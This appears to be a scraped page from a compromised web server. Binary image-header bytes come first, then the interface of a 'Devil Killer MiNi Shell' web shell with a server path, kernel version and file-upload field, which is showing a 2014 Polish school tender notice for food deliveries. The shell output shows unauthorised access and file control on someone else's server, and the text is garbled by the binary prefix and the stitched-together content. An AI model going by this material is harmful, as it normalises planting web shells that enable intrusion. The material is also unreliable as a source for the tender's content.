JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140716/154789-N-2014.html

<p class="kh_header"><b>Górki Wielkie: Zakup wraz z dostawą artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 154789 - 2014; data zamieszczenia: 16.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Publicznych w Górkach Wielkich , Ul. Szkolna 1, 43-436 Górki Wielkie, woj. śląskie, tel. 33 853 92 78, faks 33 853 99 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zspgorki.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wraz z dostawą artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest zakup wraz z dostawą artykułów spożywczych dla Zespołu Szkół Publicznych w Górkach Wielkich z podziałem na 11części:
Część I     Zamówienia - dostawa mięsa i wędlin; CPV 15.11.00.00-2
Część II    Zamówienia - dostawa mięsa drobiowego, CPV 15.11.20.00-6
Część III   Zamówienia - dostawa produktów nabiałowych; CPV 15.50.00.00-3
Część IV   Zamówienia - dostawa mrożonek; CPV 15.33.11.70-9
Część V    Zamówienia - dostawa warzyw i owoców; CPV 03.20.00.00-3
Część VI   Zamówienia - dostawa ziemniaków; CPV 03.21.00.00-6
Część VII  Zamówienia  - dostawa jaj; CPV 03.14.25.00-3
Część VIII Zamówienia - dostawa ryb CPV 15.20.00.00-0
Część IX Zamówienia - dostawa pozostałych artykułów spożywczych; CPV 15.80.00.00-6
Część X Zamówienia - dostawa soków ; CPV 15.98.00.00-1
Część XI Zamówienia - dostawa pieczywa i wyrobów cukierniczych. CPV 15.81.00.00-9
2. Poszczególne dostawy będą realizowane sukcesywnie w okresie obowiązywania umowy po zamówieniu złożonym telefonicznie przez  Zamawiającego (intendenta) z wyprzedzeniem na co najmniej jednego dnia roboczego. Dostawa powinna nastąpić w dniu wyznaczonym przez zamawiającego w godzinach 7,00 - 9,00 i realizowana będzie środkiem transportu Wykonawcy na jego koszt. Dostarczony towar powinien być w początkowym okresie terminie przydatności do spożycia
3. Oferowane produkty żywnościowe muszą być wysokiej jakości, spełniać parametry jakościowe określone dla danego asortymentu przez PN, spełniać wymogi sanitarno - epidemiologiczne i zasady systemu HACCP.
4. Dostawy artykułów żywnościowych muszą być realizowane zgodnie z zasadami GHP Dobrej Praktyki Higienicznej) dotyczy głównie:
-świadectwa jakości przy dostawach mięsa, przetworów mięsnych, mleka i przetworów mlecznych i ryb oraz przy dostawie jaj - aktualne zaświadczenie z Powiatowego Inspektoratu
Weterynarii o podleganiu kontroli.
- dostarczony asortyment dotyczący mięsa i wyrobów wędliniarskich powinien posiadać handlowy dokument identyfikacyjny.
5.Przedmiot zamówienia musi być dostarczony odpowiednim (dostosowanym do asortymentu) środkiem transportu spełniającym wymagania sanitarne, w opakowaniach gwarantujących bezpieczny transport i magazynowanie.
6. Zamawiający zastrzega sobie że w okresach przerw zimowych i wakacyjnych oraz przerw wynikłych z  kalendarzowych świąt i dni wolnych od zajęć lekcyjnych - zamówienia nie będą zgłaszane
7. Zamawiający zastrzega sobie możliwość wprowadzania zmian do umowy w zakresie zmniejszania ilości i wartości dostaw w sytuacjach niezależnych do Zamawiającego oraz w przypadku wystąpienia sytuacji, których Zamawiający nie mógł przewidzieć w chwili jej zawarcia (np. zmniejszenie stanów osobowych).
8. Zamawiający nie będzie ponosił ujemnych skutków finansowych spowodowanych zmniejszeniem ilości i wartości dostaw przewidzianych w umowie.
9. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 20% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 7 Ustawy w przypadku: wyczerpania ilości oraz asortymentu uszczegółowionego w formularzu ofertowym zgodnym z zadaniem. 
Wykonawca, któremu zostanie udzielone zamówienie podstawowe zobowiązany będzie do zastosowania w zamówieniach uzupełniających cen nie wyższych niż zastosowanych w zamówieniu podstawowym(załącznik nr 5 do SIWZ).
10.Zamawiający przewiduje prawo opcji na podstawie art. 34 ust. 5 ustawy Pzp - do wysokości 10% wartości wynagrodzenia ofertowego określonego w umowie;
11. Opis przedmiotu zamówienia zawiera załącznik nr 6 do SIWZ.
12.Jeśli w jakimkolwiek punkcie załącznikach użyto nazwy towarowej - Wykonawca może złożyć ofertę na towar równoważny do towaru, który wymieniono przy użyciu nazwy towarowej. W tym wypadku wszelkie ryzyko (w tym koszty ewentualnych ekspertyz) związane z udowodnieniem tzw. równoważności artykułów żywnościowych wskazanych w formularzu ofertowym, spoczywa na Wykonawcy. Wykonawca zobowiązany jest w takim przypadku wykazać, że dostarczone przez niego artykuły spełniają takie same wymagania jak produkty określone przez Zamawiającego dotyczące składu produktu, jego jakości, trwałości.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Na podstawie art. 67 ust. 1 pkt. 7 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2013 poz. 907 z późn. zm.). Prawo Zamówień Publicznych w przypadku wystąpienia okoliczności określonych w w/w art., zamawiający zastrzega sobie możliwość udzielenia wykonawcy dostaw, zamówień uzupełniających, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.20.00-6, 15.50.00.00-3, 15.33.11.70-9, 03.20.00.00-3, 03.21.00.00-6, 03.14.25.00-3, 15.20.00.00-0, 15.80.00.00-6, 15.98.00.00-1, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ Formularz oferty według załączonego wzoru (załącznik nr 1 do SIWZ). 
2/ W przypadku, gdy dokumenty przetargowe podpisują inne osoby niż ujawnione w rejestrach, do oferty należy dołączyć pełnomocnictwo udzielone przez osoby upoważnione, z zaznaczeniem zakresu i okresu udzielonego pełnomocnictwa.
5. Oferty składane wspólnie (konsorcjum, spółka cywilna)
1.	Dopuszcza się możliwość składania jednej oferty przez dwóch lub więcej wykonawców, pod warunkiem, że wykonawcy działający wspólnie ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania w postępowaniu i do podpisania umowy o zamówienie publiczne w przypadku jego uzyskania. Dokument pełnomocnika należy przedstawić w formie oryginału lub notarialnie poświadczonej kopii.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Działając zgodnie z Art. 144 ust.1 ustawy Prawo Zamówień Publicznych, Zamawiający dopuszcza możliwość zmiany treści umowy w stosunku do oferty w szczególności w przypadkach:
1/ Zmian ogólnych:
a)zmiany będące skutkiem poprawy oczywistej pomyłki pisarskiej bądź rachunkowej,
b) zmiany stanu prawnego, mające wpływ na realizację przedmiotu zamówienia,
2/ Zmian wpływających na termin wykonania umowy:
a) możliwe jest przedłużenie terminu zakończenia umowy o czas opóźnienia, jeżeli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego lub jest efektem działania siły wyższej lub przyczyn obiektywnych niezależnych od Wykonawcy.
3/ Zmian wpływających na wynagrodzenie:
a)	możliwa jest zmiana postanowień umowy, w związku ze zmianą stawki podatku od towarów i usług ( VAT ) 
b)	W przypadku skorzystania z prawa opcji
4/ Innych zmian - z zastrzeżeniem art. 140 ust. 3 ustawy Prawo Zamówień Publicznych
5/ Zmiany zawartej umowy wymagają pisemnego uzasadnienia, sporządzonego przez komisję powołaną przez Zamawiającego. Zmiana umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej.
6/Zamawiający zastrzega sobie prawo odstąpienia od umowy w przypadkach wskazanych w umowie i ustawie oraz gdy:
7/ zostanie ogłoszona likwidacja Wykonawcy,
8/ Wykonawca nie rozpoczął realizacji umowy.
9/ Wykonawca dopuścił się rażącego naruszenia innych istotnych postanowień umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zspgorki.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Publicznych, ul. Szkolna 1, 43-436 Górki Wielkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2014 godzina 10:30, miejsce: Zespół Szkół Publicznych, ul. Szkolna 1, 43-436 Górki Wielkie sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zamówienia - dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Schab wp z kością, mięso świeże o właściwych cechach organoleptycznych KL A	1100kg
Karczek wp. z kością, mięso świeże o właściwych cechach organoleptycznych KL A	210kg
Łopatka wp. b/k, mięso świeże o właściwych cechach organoleptycznych KL A	910kg
Boczek wędzony, świeży o właściwych cechach organoleptycznych I gat.	360kg
Pieczeń wołowa  extra - zrazowa górna 
(na rolady i bitki), mięso świeże o właściwych cechach organoleptycznych KL A	400kg
Wołowe b/k z łopatki, mięso świeże o właściwych cechach organoleptycznych KL A	400kg
Kości wędz.(karczku kotleta)   
świeże o właściwych cechach organoleptycznych KL A	330kg
Kiełbasa  toruńska świeża o właściwych cechach organoleptycznych I gat.	240kg
Kiełbasa śląska wp. świeża o właściwych cechach organoleptycznych I gat.	140kg
Kiełbasa podwawelska
świeża o właściwych cechach organoleptycznych I gat.	180kg
Mostek wołowy, mięso świeże o właściwych cechach organoleptycznych KL A	80kg
Rozbratel wołowy, mięso świeże o właściwych cechach organoleptycznych KL A	30kg
Wątroba wp. świeża o właściwych cechach organoleptycznych KL A
	50 kg
Mortadela wp świeża o właściwych cechach organoleptycznych I gat.	40kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zamówienia - dostawa mięsa drobiowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Indyk - filet z piersi bez skóry i kości elementy świeże o właściwych cechach organoleptycznych KL A	 240kg
Indyk - udziec z kością, 
elementy świeże o właściwych cechach organoleptycznych KL A	300kg
Kurczak - noga bez kręgosłupa (wykrawana)
elementy świeże o właściwych cechach organoleptycznych KL A	200kg
Kurczak - filet z udźca  bez skóry i kości, elementy świeże o właściwych cechach organoleptycznych KL A 	255kg
Kurczak - udziec ze skórą i kością, elementy świeże o właściwych cechach organoleptycznych KL A 	180kg
Kurczak - filet  św. elementy świeże o właściwych cechach organoleptycznych KL A	850kg
Kurczak-porcja rosołowa 
elementy świeże o właściwych cechach organoleptycznych KL A	200kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zamówienia - dostawa produktów nabiałowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> JOGURT - Jogobella 150g	2500szt
JOGURT - Serduszko 125g	1500szt
JOGURT - Polskie Smaki 130g
	760 szt
MASŁO EXTRA  200g
82% tłuszczu	1250szt
MIKS TŁUSZCZOWY - 200g do smarowania 76 % tłuszczu  	370szt
MLEKO W PROSZKU 400g	20szt
MLEKO W PROSZKU
500g	20szt
MLEKO 2% 0,9l w woreczku długoterminowe co najmniej 10 dni
	250szt
ŚMIETANA 400g 12%
	380szt
ŚMIETANA 400g 18%
	1700szt
TWARÓG PÓŁTŁUSTY
	460kg
SER ŻÓŁTY - I gat
	120kg
DESER - Zott Monte 
55 g
	780szt
PALMA 250g
	10szt
JOGURT NATURALNY 2% 370g	330szt
SEREK -  Danio 150g
	790 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zamówienia - dostawa mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> FASOLA SZPARAGOWA- najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany 2,50kg	180 kg
FASOLA SZPARAGOWA 
najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany 0,45kg	15 kg
KALAFIOR MROŻONY 
najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany
2,50kg	165 kg
KALAFIOR MROŻONY 
najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany
0,45kg	15 kg
TRUSKAWKI MROŻONE
najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany
 2,50kg	70 kg
ZUPA JARZYNOWA - min 6 składników
najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany
2,50kg	100 kg
MIESZANKA KOMPOTOWA - min 4 składniki
najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany
 2,50kg	330 kg
BROKUŁY MROŻONE
najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany
2,50kg	60 kg
ZUPA PREZYDENCKA 
najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany
 0,45kg	60 kg
MIESZANKA CHIŃSKA 
najwyższej jakości, produkt świeżo mrożony, czysty, właściwie opakowany 2,50kg
	48 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zamówienia - dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BURAK ĆWIKŁOWY, świeży, bez śladów uszkodzeń mechanicznych I gatunek	520 kg
CZOSNEK świeży, nie przesuszony, nie zgniły, bez śladów uszkodzeń mechanicznych I gatunek	22 kg
CEBULA świeża, nie przesuszona, nie zgniła, bez śladów uszkodzeń mechanicznych I gatunek	180 kg
SZCZYPIOREK zielony, świeży, nie zgniły, nie zwiędnięty, bez śladów uszkodzeń mechanicznych 	220 pęczki
JABŁKA kruche, słodkie, czyste, bez śladów uszkodzeń mechanicznych	1100 kg
KOPEREK ZIELONY, czysty, świeży, nie zgniły, nie zwiędnięty, bez śladów uszkodzeń mechanicznych	410szt/pęczki
KAPUSTA BIAŁA świeża, bez śladów uszkodzeń mechanicznych	1350 kg
KAPUSTA KISZONA
świeża, bez śladów uszkodzeń mechanicznych	300 kg
KAPUSTA WŁOSKA
świeża, bez śladów uszkodzeń mechanicznych	210 kg
KAPUSTA CZERWONA
świeża, bez śladów uszkodzeń mechanicznych	580 kg
MARCHEW świeża, sucha, bez śladów uszkodzeń mechanicznych	610 kg
OGÓREK KISZONY 	310 kg
OGÓREK ZIELONY
świeży, czysty, nie zwiędnięty 	360 kg
CYTRYNY świeże, nie zwiędnięte, bez śladów uszkodzeń mechanicznych	60 kg
